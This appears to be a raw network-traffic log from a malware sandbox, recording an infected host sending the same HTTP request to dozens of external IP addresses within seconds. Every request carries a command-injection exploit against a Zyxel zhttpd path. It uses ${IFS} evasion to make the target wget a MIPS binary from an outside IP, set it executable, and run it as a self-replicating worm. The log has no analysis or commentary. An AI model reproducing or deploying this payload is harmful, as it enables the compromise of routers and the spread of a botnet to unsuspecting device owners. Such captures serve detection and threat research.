                                      Jan 14, 2024 15:50:31.959712982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      761192.168.2.144771449.164.7.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.959758043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      762192.168.2.1436420163.49.140.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.959785938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      763192.168.2.145293625.93.13.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.959846020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      764192.168.2.1436000146.211.47.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.959896088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      765192.168.2.1438582100.50.202.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.959934950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      766192.168.2.145479080.135.97.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.959963083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      767192.168.2.146011057.162.227.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.959986925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      768192.168.2.14448941.229.117.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.960042953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      769192.168.2.1443566112.162.232.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.960083008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      770192.168.2.1458384195.231.117.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.960113049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      771192.168.2.145349689.179.176.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.960163116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      772192.168.2.1455716135.160.225.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.960180044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      773192.168.2.1442788181.79.118.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.960237026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      774192.168.2.145122832.36.208.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.960279942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      775192.168.2.1447684162.192.166.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.960331917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      776192.168.2.145348691.124.10.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.960360050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      777192.168.2.1435256112.22.48.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.960388899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      778192.168.2.144271232.16.180.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.960445881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      779192.168.2.1446240190.64.78.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.960469961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      780192.168.2.1450290186.221.93.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.960516930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      781192.168.2.143501845.32.213.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.960577011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      782192.168.2.1460308198.37.176.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.960628033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      783192.168.2.1440404131.20.142.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.960652113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      784192.168.2.143836460.2.131.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.960705996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      785192.168.2.1434646160.122.82.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.960742950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      786192.168.2.144043876.166.97.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.960779905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      787192.168.2.143994288.89.97.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.960834980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      788192.168.2.1441858210.13.237.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.960869074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      789192.168.2.1436836202.236.144.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.960896015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      790192.168.2.143336223.170.215.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.960937023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      791192.168.2.1436268118.10.217.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.960980892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      792192.168.2.1447318129.129.114.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.961049080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      793192.168.2.145953045.80.7.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.961081028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      794192.168.2.1443316106.144.237.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.961106062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      795192.168.2.1436966201.63.57.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.961164951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      796192.168.2.1458982202.145.29.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.961208105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      797192.168.2.1458866133.227.125.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.961240053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      798192.168.2.143446852.121.8.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.961303949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      799192.168.2.14602968.201.8.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.961344957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      800192.168.2.1447296161.245.228.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.964868069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      801192.168.2.143575246.26.42.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.964904070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      802192.168.2.144448858.41.10.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.964962959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      803192.168.2.144245239.153.75.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.965002060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      804192.168.2.1434612179.30.72.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.965032101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      805192.168.2.144861091.135.229.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.973839045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      806192.168.2.1438704200.161.79.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.973881006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      807192.168.2.145977224.54.40.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.973927021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      808192.168.2.1440956199.207.13.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.973978043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      809192.168.2.1448064136.41.136.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.974040985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      810192.168.2.1434136110.234.21.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.974081993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      811192.168.2.1436448195.17.147.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.974117994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      812192.168.2.143794632.195.4.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.974164963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      813192.168.2.146045678.183.213.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.974219084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      814192.168.2.143773438.45.167.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.974239111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      815192.168.2.145143088.21.29.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.974276066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      816192.168.2.1437236126.102.191.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.974322081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      817192.168.2.145501046.151.53.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.974356890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      818192.168.2.143532447.239.153.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.974395990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      819192.168.2.144517897.232.244.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.974435091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      820192.168.2.1437396122.82.198.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.974489927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      821192.168.2.146046271.169.143.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.974512100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      822192.168.2.1445546120.9.245.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:32.974559069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      823192.168.2.1450288106.73.186.71443
                                      TimestampBytes transferredDirectionData
